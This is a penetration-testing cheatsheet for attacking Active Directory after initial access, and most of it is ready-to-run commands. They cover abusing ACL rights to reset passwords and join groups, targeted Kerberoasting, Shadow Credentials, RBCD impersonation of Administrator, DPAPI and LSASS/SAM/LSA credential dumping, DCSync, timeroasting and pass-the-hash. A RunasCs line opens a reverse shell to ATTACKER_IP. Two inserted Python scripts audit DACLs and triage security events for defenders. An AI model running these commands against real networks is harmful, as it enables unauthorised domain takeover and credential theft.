ACE Abuse & Lateral Movement

After initial access in an Active Directory environment, BloodHound will often reveal ACL-based attack paths. This cheatsheet covers the most common ACE (Access Control Entry) abuses, credential extraction techniques, and lateral movement methods used in assumed breach scenarios.


ACE Abuse Quick Reference

ACE Right           | Target Type | Attack                                | Result
--------------------|-------------|---------------------------------------|----------------------
GenericAll          | User        | Force password change                 | Full control of user
GenericAll          | Group       | Add member to group                   | Group membership
GenericAll          | Computer    | RBCD / Shadow Credentials             | Impersonate any user
GenericWrite        | User        | Targeted Kerberoasting / Shadow Creds | Password hash or auth
WriteSPN            | User        | Targeted Kerberoasting                | TGS hash to crack
ForceChangePassword | User        | Reset password                        | Full control of user
WriteOwner          | Any object  | Take ownership, grant rights          | Full control
AddSelf             | Group       | Add yourself to group                 | Group membership
WriteDacl           | Any object  | Modify ACL, grant GenericAll          | Full control
AddAllowedToAct     | Computer    | RBCD                                  | Impersonate any user

Tip: GenericAll on a group only controls the group object itself (add/remove members, change properties). It does NOT give you GenericAll on the group's members.
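
To audit for these rights from the defender's side, here is an added example that is not part of the original cheatsheet: a Python script that parses an object's SDDL DACL string (such as the .Sddl property Get-Acl returns for an AD object) and flags the rights from the table above whenever they are granted to a principal outside a trusted set. The SDDL string, the SIDs and the trusted set are constructed for illustration; the schema GUIDs are the AD ones for the listed extended right and attributes.

```python
import re
RIGHT_BITS = {"GA": 0x10000000, "GW": 0x40000000, "WO": 0x80000,  # SDDL letter pairs -> mask bits
              "WD": 0x40000, "WP": 0x20, "CR": 0x100, "RS": 0x8}
GENERIC = {0x10000000: "GenericAll", 0x40000000: "GenericWrite",
           0x80000: "WriteOwner", 0x40000: "WriteDacl"}
# AD schema GUIDs that turn an object-specific CR/WP/RS ACE into one of the table's rights
GUID_FORCE_PWD = "00299570-246d-11d0-a768-00aa006e0529"  # User-Force-Change-Password
GUID_MEMBER = "bf9679c0-0de6-11d0-a285-00aa003049e2"     # member
GUID_SPN = "f3a64788-5306-11d1-a9c5-0000f80367c1"        # servicePrincipalName
GUID_ACT = "3f78c3e5-f79a-46bd-a0b8-9d18116ddc79"        # msDS-AllowedToActOnBehalfOfOtherIdentity
ACE_RE = re.compile(r"\(([^)]*)\)")

def rights_mask(field):
    """Convert the SDDL rights field (letter pairs or a 0x hex mask) into an access mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    return sum(RIGHT_BITS.get(field[i:i + 2], 0) for i in range(0, len(field), 2))

def classify(mask, guid):
    """Name the quick-reference rights granted by one allow ACE."""
    guid = guid.lower()
    hits = [name for bit, name in GENERIC.items() if mask & bit]
    if mask & 0x100:  # control access; an empty GUID means every extended right
        hits += {"": ["AllExtendedRights"], GUID_FORCE_PWD: ["ForceChangePassword"]}.get(guid, [])
    if mask & 0x20:   # write property; an empty GUID means every attribute
        hits += {"": ["WriteProperty(all)"], GUID_SPN: ["WriteSPN"], GUID_MEMBER: ["AddMember"],
                 GUID_ACT: ["AddAllowedToAct"]}.get(guid, [])
    if mask & 0x8 and guid in ("", GUID_MEMBER):  # self-write on member
        hits.append("AddSelf")
    return hits

def audit_dacl(sddl, trusted_sids):
    """Return (sid, rights) for each allow ACE granting a listed right to an untrusted SID."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # DACL only; a SACL would follow "S:"
    findings = []
    for ace in ACE_RE.findall(dacl):
        ace_type, _flags, rights, guid, _inherit, sid = ace.split(";")[:6]
        if ace_type in ("A", "OA") and sid not in trusted_sids:  # deny ACEs are not findings
            hits = classify(rights_mask(rights), guid)
            if hits:
                findings.append((sid, hits))
    return findings

# Constructed sample: a user object's DACL carrying three over-permissive ACEs
SAMPLE_SDDL = ("O:DAG:DAD:(A;;GA;;;DA)(A;;0x10000000;;;S-1-5-21-1-2-3-1105)"
               "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-1-2-3-1106)"
               "(OA;;WP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-21-1-2-3-1107)"
               "(A;;RPLCLORC;;;AU)")
TRUSTED = {"DA", "SY", "BA"}  # SDDL aliases for Domain Admins, SYSTEM, Builtin Administrators
FINDINGS = audit_dacl(SAMPLE_SDDL, TRUSTED)  # the three S-1-5-21-1-2-3-11xx principals
```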


GenericAll / FullControl

On a User

Force a password change without knowing the current password. Three methods depending on your tooling.

# Linux - net rpc
net rpc password TARGET_USER 'NewPass123!' -U DOMAIN/USER%PASS -S DC_IP

# Linux - bloodyAD
bloodyAD -u USER -p PASS -d DOMAIN --host DC_IP set password TARGET_USER 'NewPass123!'

# Linux - bloodyAD with pass-the-hash
bloodyAD -u USER -p :NTHASH -d DOMAIN --host DC_IP set password TARGET_USER 'NewPass123!'

# Windows - PowerView
Set-DomainUserPassword -Identity TARGET_USER -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

On a Group

Add a user to the group to inherit its permissions.

# Linux - net rpc
net rpc group addmem "GROUP_NAME" USER -U DOMAIN/USER%PASS -S DC_IP

# Linux - bloodyAD
bloodyAD -u USER -p PASS -d DOMAIN --host DC_IP add groupMember "GROUP_NAME" USER

# Windows - PowerView
Add-DomainGroupMember -Identity "GROUP_NAME" -Members USER

On a Computer

With GenericAll on a computer object, you can set up Resource-Based Constrained Delegation (RBCD) or add Shadow Credentials.

# Option 1: RBCD (see RBCD section below)
# Option 2: Shadow Credentials
certipy shadow auto -u USER@DOMAIN -p PASS -account TARGET_COMPUTER$

GenericWrite / WriteProperty

GenericWrite allows writing the attributes of the target object. The most common abuse is setting a Service Principal Name (SPN) on the target for Targeted Kerberoasting.

# Automatic: sets SPN, requests TGS, removes SPN
targetedKerberoast.py -u USER -p PASS -d DOMAIN --dc-ip DC_IP

# Manual: set SPN, request ticket, crack offline
Set-DomainObject -Identity TARGET_USER -SET @{serviceprincipalname='fake/spn'}

# Crack the TGS hash
hashcat -m 13100 tgs.txt ~/tools/wordlists/rockyou.txt

Tip: GenericWrite also enables Shadow Credentials as an alternative to Kerberoasting. Shadow Credentials is stealthier because it does not modify the SPN attribute.


ForceChangePassword

Allows resetting a user's password without knowing their current password. Same commands as GenericAll on a user.

# bloodyAD
bloodyAD -u USER -p PASS -d DOMAIN --host DC_IP set password TARGET_USER 'NewPass123!'

# PowerView
Set-DomainUserPassword -Identity TARGET_USER -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

WriteOwner

Take ownership of the object, then grant yourself additional rights (e.g., ResetPassword), then exploit.

# Step 1: Take ownership
Set-DomainObjectOwner -Identity TARGET_USER -OwnerIdentity ATTACKER_USER

# Step 2: Grant ResetPassword right
Add-DomainObjectAcl -TargetIdentity TARGET_USER -PrincipalIdentity ATTACKER_USER -Rights ResetPassword

# Step 3: Reset password
Set-DomainUserPassword -Identity TARGET_USER -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

WriteSPN - Targeted Kerberoasting

Set an arbitrary SPN on a user account, request a TGS ticket for that SPN, then crack it offline.

# Automated (sets SPN, gets TGS, removes SPN in one step)
targetedKerberoast.py -u USER -p PASS -d DOMAIN --dc-ip DC_IP

# Crack the hash
hashcat -m 13100 tgs.txt ~/tools/wordlists/rockyou.txt

# Manual approach
# Set SPN
Set-DomainObject -Identity TARGET_USER -SET @{serviceprincipalname='fake/spn'}

# Request TGS
.\Rubeus.exe kerberoast /user:TARGET_USER /nowrap

# Remove SPN (cleanup)
Set-DomainObject -Identity TARGET_USER -Clear serviceprincipalname

AddSelf

Allows adding yourself to a group. Commonly seen on custom groups that grant additional privileges.

# bloodyAD
bloodyAD -u USER -p PASS -d DOMAIN --host DC_IP add groupMember "GROUP_NAME" USER

# PowerView
Add-DomainGroupMember -Identity "GROUP_NAME" -Members USER

Tip: After adding yourself to a group, you may need to re-authenticate (new TGT) for the group membership to take effect in your Kerberos ticket.


Re-enabling Disabled Accounts

If a target account has ACCOUNTDISABLE set, remove the flag before using it.

# The flag to clear is passed with -f
bloodyAD -u USER -p PASS -d DOMAIN --host DC_IP remove uac TARGET_USER -f ACCOUNTDISABLE

Shadow Credentials

Requires GenericWrite or GenericAll over the target account. Adds a Key Credential to the target's msDS-KeyCredentialLink attribute, then uses it to obtain a TGT via PKINIT.

This is an alternative to Targeted Kerberoasting that does not require cracking. It directly returns a TGT and NT hash.

# Automatic - returns RC4 (NTLM) hash + .ccache
certipy shadow auto -u USER@DOMAIN -p PASS -account TARGET_ACCOUNT

# With pass-the-hash
certipy shadow auto -u USER@DOMAIN -hashes :NTHASH -account TARGET_ACCOUNT

# Result: TARGET_ACCOUNT.ccache + RC4 hash
export KRB5CCNAME=TARGET_ACCOUNT.ccache

Tip: Shadow Credentials requires ADCS to be present in the domain (PKINIT). If there is no CA, fall back to Targeted Kerberoasting or password reset.


DPAPI Lateral Movement

DPAPI (Data Protection API) protects credentials stored in Windows Credential Manager, browser passwords, and other secrets. You can decrypt these without admin rights if you know the user's password.

Locate Credential Blobs and Master Keys

# List credential blobs
dir C:\Users\TARGET_USER\AppData\Roaming\Microsoft\Credentials\
dir C:\Users\TARGET_USER\AppData\Local\Microsoft\Credentials\

# List master keys (the directory under Protect is named after the user's SID)
dir C:\Users\TARGET_USER\AppData\Roaming\Microsoft\Protect\SID\

Decrypt with User Password

# Decrypt master key using the user's plaintext password (the user's SID is needed to derive the key)
impacket-dpapi masterkey -file MASTERKEY_FILE -sid USER_SID -password USER_PASS

# Decrypt the credential blob using the decrypted master key
impacket-dpapi credential -file CREDENTIAL_BLOB -key MASTERKEY_HEX

Decrypt with Domain Backup Key

If you have domain admin access, export the domain backup key and use it to decrypt any user's master keys.

# Export domain backup key (requires DA)
impacket-dpapi backupkeys --export -t DOMAIN/USER:PASS@DC_IP

# Decrypt master key with the backup key
impacket-dpapi masterkey -file MASTERKEY_FILE -pvk domain_backup.pvk

# Decrypt credential blob
impacket-dpapi credential -file CREDENTIAL_BLOB -key MASTERKEY_HEX

Windows Credential Manager (Interactive Session)

Requires an interactive logon session (logon type 2). Use RunasCs to get one.

# Dump Windows Credential Manager (requires interactive session)
Invoke-WCMDump

Mass DPAPI Dump via nxc

# Requires local admin on the target
nxc smb TARGET_IP -u USER -p PASS -M dpapi

Credential Dumping

SAM - Local Account Hashes

nxc smb TARGET_IP -u USER -p PASS --sam

LSA Secrets - Service Credentials

nxc smb TARGET_IP -u USER -p PASS --lsa

LSASS - In-Memory Credentials

nxc smb TARGET_IP -u USER -p PASS -M lsassy

DPAPI Mass Dump

nxc smb TARGET_IP -u USER -p PASS -M dpapi

Tip: Always check SAM, LSA, and LSASS when you get local admin. Service account credentials in LSA Secrets are often reused across machines or have domain privileges.


DCSync

Requires DS-Replication-Get-Changes + DS-Replication-Get-Changes-All rights, or Domain Admin / Backup Operators membership.

# With plaintext credentials
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm

# With NT hash
impacket-secretsdump DOMAIN/USER@DC_IP -hashes :NTHASH -just-dc-ntlm

# With Kerberos ticket
KRB5CCNAME=ticket.ccache impacket-secretsdump -k -no-pass DOMAIN/USER@DC_FQDN -just-dc-ntlm

# Via nxc (full NTDS dump)
nxc smb DC_IP -u USER -p PASS --ntds

Tip: Use -just-dc-ntlm to extract only NT hashes (faster). Omit it to also get Kerberos keys and cleartext passwords if available.


Timeroasting

Exploits Windows NTP authentication to obtain MD5 hashes of computer accounts and trust accounts. These hashes can be cracked offline to recover passwords of computer accounts (which are sometimes set manually and weak).

# Capture hashes (requires domain user credentials)
nxc smb DC_IP -u USER -p PASS -M timeroast -o OUTPUT=timeroast.txt

# Crack the hashes (hashcat mode 31300)
hashcat -m 31300 timeroast.txt ~/tools/wordlists/rockyou.txt

Tip: This is most useful when computer accounts in custom OUs have manually-set passwords (e.g., Support-Computer1$). Default machine account passwords are randomly generated and not crackable.


RBCD - Resource-Based Constrained Delegation

Requires AddAllowedToAct (WriteProperty on msDS-AllowedToActOnBehalfOfOtherIdentity) on a computer object.

Standard RBCD (MAQ > 0)

When the Machine Account Quota allows creating computer accounts.

# Step 1: Create a machine account
impacket-addcomputer DOMAIN/USER:PASS -computer-name FAKE$ -computer-pass 'Fake1234!'

# Step 2: Configure RBCD delegation
impacket-rbcd -delegate-from 'FAKE$' -delegate-to 'TARGET_COMPUTER$' -action write \
    DOMAIN/USER:PASS -dc-ip DC_IP

# Step 3: Get ticket impersonating Administrator
getST.py -spn cifs/TARGET_COMPUTER.DOMAIN -impersonate administrator \
    DOMAIN/'FAKE$':'Fake1234!' -dc-ip DC_IP

# Step 4: Use the ticket
export KRB5CCNAME=administrator@cifs_TARGET_COMPUTER.DOMAIN@DOMAIN.ccache
wmiexec.py -k -no-pass DOMAIN/administrator@TARGET_COMPUTER.DOMAIN

SPN-less RBCD (MAQ = 0)

When you cannot create machine accounts, use an existing controlled user account instead.

# Step 1: Configure RBCD with a regular user account
impacket-rbcd -delegate-from CONTROLLED_USER -delegate-to 'TARGET_COMPUTER$' -action write \
    DOMAIN/ATTACKER_USER:PASS -dc-ip DC_IP

# Step 2: S4U2self (U2U) + S4U2Proxy
getST.py -u2u -impersonate administrator -spn cifs/TARGET_COMPUTER.DOMAIN \
    DOMAIN/CONTROLLED_USER:PASS -dc-ip DC_IP

# Step 3: Access
export KRB5CCNAME=administrator@cifs_TARGET_COMPUTER.DOMAIN@DOMAIN.ccache
wmiexec.py -k -no-pass DOMAIN/administrator@TARGET_COMPUTER.DOMAIN
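
As an added, defender-side example that is not part of the original cheatsheet, the following Python triage logic runs over constructed Windows security events and flags the directory writes that the WriteSPN, Shadow Credentials, DCSync and RBCD sections above rely on: Event ID 5136 writes to servicePrincipalName, msDS-KeyCredentialLink, msDS-AllowedToActOnBehalfOfOtherIdentity and userAccountControl, the set-then-clear SPN pattern of targetedKerberoast.py, and Event ID 4662 use of the replication extended rights. The event records, subjects and DNs are constructed, and the field names are simplified from the real event XML.

```python
from datetime import datetime, timedelta
# Event ID 5136 attribute writes that correspond to techniques in the sections above
WATCHED_ATTRS = {
    "servicePrincipalName": "SPN write (WriteSPN / Targeted Kerberoasting)",
    "msDS-KeyCredentialLink": "key credential write (Shadow Credentials)",
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "RBCD delegation write",
    "userAccountControl": "userAccountControl change (e.g. ACCOUNTDISABLE cleared)",
}
# Extended-right GUIDs in Event ID 4662 that mean directory replication (DCSync)
REPL_GUIDS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
              "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}   # DS-Replication-Get-Changes-All
ROAST_WINDOW = timedelta(minutes=10)  # SPN added and removed again this fast = roast pattern

def triage(events, allowed_subjects):
    """Return one alert line per suspicious 5136/4662 record from a non-allow-listed subject."""
    alerts, spn_adds = [], {}
    for ev in sorted(events, key=lambda e: e["time"]):
        subj, who = ev["subject"], f"{ev['time']:%H:%M} {ev['subject']} -> {ev['object']}"
        if subj in allowed_subjects:
            continue  # DCs, ADCS and provisioning accounts legitimately write these attributes
        if ev["id"] == 5136 and ev["attr"] in WATCHED_ATTRS:
            alerts.append(f"{who}: {WATCHED_ATTRS[ev['attr']]} ({ev['op']})")
            key = (subj, ev["object"])
            if ev["attr"] == "servicePrincipalName":
                if ev["op"] == "added":
                    spn_adds[key] = ev["time"]
                elif key in spn_adds and ev["time"] - spn_adds[key] <= ROAST_WINDOW:
                    alerts.append(f"{who}: SPN set then cleared within {ROAST_WINDOW} (Targeted Kerberoasting pattern)")
        elif ev["id"] == 4662 and REPL_GUIDS & set(ev["properties"]):
            alerts.append(f"{who}: replication rights exercised (DCSync pattern)")
    return alerts

# Constructed sample log: four writes by one user, then a benign SPN write by a DC
T = datetime(2024, 1, 15, 9, 0)
def mk(minutes, **fields):
    return {"time": T + timedelta(minutes=minutes), **fields}
SAMPLE_EVENTS = [
    mk(0, id=5136, subject="CORP\\jdoe", object="CN=svc_backup,DC=corp,DC=local",
       attr="servicePrincipalName", op="added"),
    mk(2, id=5136, subject="CORP\\jdoe", object="CN=svc_backup,DC=corp,DC=local",
       attr="servicePrincipalName", op="deleted"),
    mk(5, id=5136, subject="CORP\\jdoe", object="CN=WS01,DC=corp,DC=local",
       attr="msDS-KeyCredentialLink", op="added"),
    mk(7, id=4662, subject="CORP\\jdoe", object="DC=corp,DC=local",
       properties=["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]),
    mk(8, id=5136, subject="CORP\\DC01$", object="CN=WS02,DC=corp,DC=local",
       attr="servicePrincipalName", op="added"),
]
ALLOWED_SUBJECTS = {"CORP\\DC01$"}
ALERTS = triage(SAMPLE_EVENTS, ALLOWED_SUBJECTS)  # five alerts, all for CORP\jdoe
```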

Remote Access Reference

WinRM

# With password
evil-winrm -i TARGET_IP -u USER -p PASS

# With NT hash (pass-the-hash)
evil-winrm -i TARGET_IP -u USER -H NTHASH

# With Kerberos
evil-winrm -i TARGET_IP -u USER -p PASS -r DOMAIN

WMI / DCOM

# With credentials
wmiexec.py DOMAIN/USER:PASS@TARGET_IP

# With Kerberos
wmiexec.py -k -no-pass DOMAIN/USER@TARGET_HOSTNAME

PSExec

# With credentials
psexec.py DOMAIN/USER:PASS@TARGET_IP

# With NT hash
psexec.py DOMAIN/USER@TARGET_IP -hashes :NTHASH

RDP

xfreerdp /u:USER /p:PASS /d:DOMAIN /v:TARGET_IP /dynamic-resolution

RunasCs

Use when you need an interactive session on the target (e.g., for DPAPI, Credential Manager access, or UAC bypass).

# Reverse shell as another user
RunasCs.exe USER PASS cmd.exe -r ATTACKER_IP:PORT --bypass-uac

# Logon type 9 (network cleartext - useful for Kerberos context)
RunasCs.exe USER PASS cmd.exe -r ATTACKER_IP:PORT -l 9

Tip: RunasCs logon type 9 creates a network logon context similar to runas /netonly. This is useful when you need Kerberos authentication to remote services without actually logging into the target machine interactively.


Cracking Credential Files

Office Documents (Excel, Word, PowerPoint)

office2john document.xlsx > hash.txt
john hash.txt --wordlist=~/tools/wordlists/rockyou.txt

Tip: If an Office file appears corrupted, check the magic bytes. A common issue is 50 48 03 04 instead of the correct 50 4B 03 04 (PK ZIP header). Fix with: printf '\x50\x4B\x03\x04' | dd of=file.xlsx bs=1 seek=0 conv=notrunc

KeePass Database

keepass2john database.kdbx > hash.txt
john hash.txt --wordlist=~/tools/wordlists/rockyou.txt

Password Safe

hashcat -m 5200 database.psafe3 ~/tools/wordlists/rockyou.txt

ZIP Archives

zip2john archive.zip > hash.txt
john hash.txt --wordlist=~/tools/wordlists/rockyou.txt